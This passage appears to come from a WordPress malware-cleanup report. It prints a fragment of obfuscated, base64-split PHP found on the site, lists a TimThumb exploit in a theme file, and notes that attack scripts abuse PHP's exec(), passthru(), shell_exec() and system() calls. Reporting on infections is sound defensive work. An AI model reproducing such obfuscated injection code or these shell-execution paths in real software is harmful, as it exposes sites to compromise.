'pd' . 'ikgc3R5bGU9' . 'Lio' . 'oaGV' . 'pZ2h' . '0' . 'fHdpZHR' . 'o' .
'KVxz' . 'Kjpcc' . 'y' . 'pbMC0yXX' . 'sxfVxzKihwdHxw' . 'eC' . 'k' . 'uKi' .
'hvdmVyZ' . 'mx' . 'vd' . '3' . 'x2aXNpYmlsaXR5KVx' . 'zKjpccy' . 'oo' .
@ 17
2.3 Exploits found:
2.3.1 TimThumb Exploit
Location: wp-content/themes/TheProfessional/timthumb.php
image
4 Suggestions
Most script try to exploit php application (WordPress), using exec(), passthru(), shell_exec(),
system() functions.
@ 18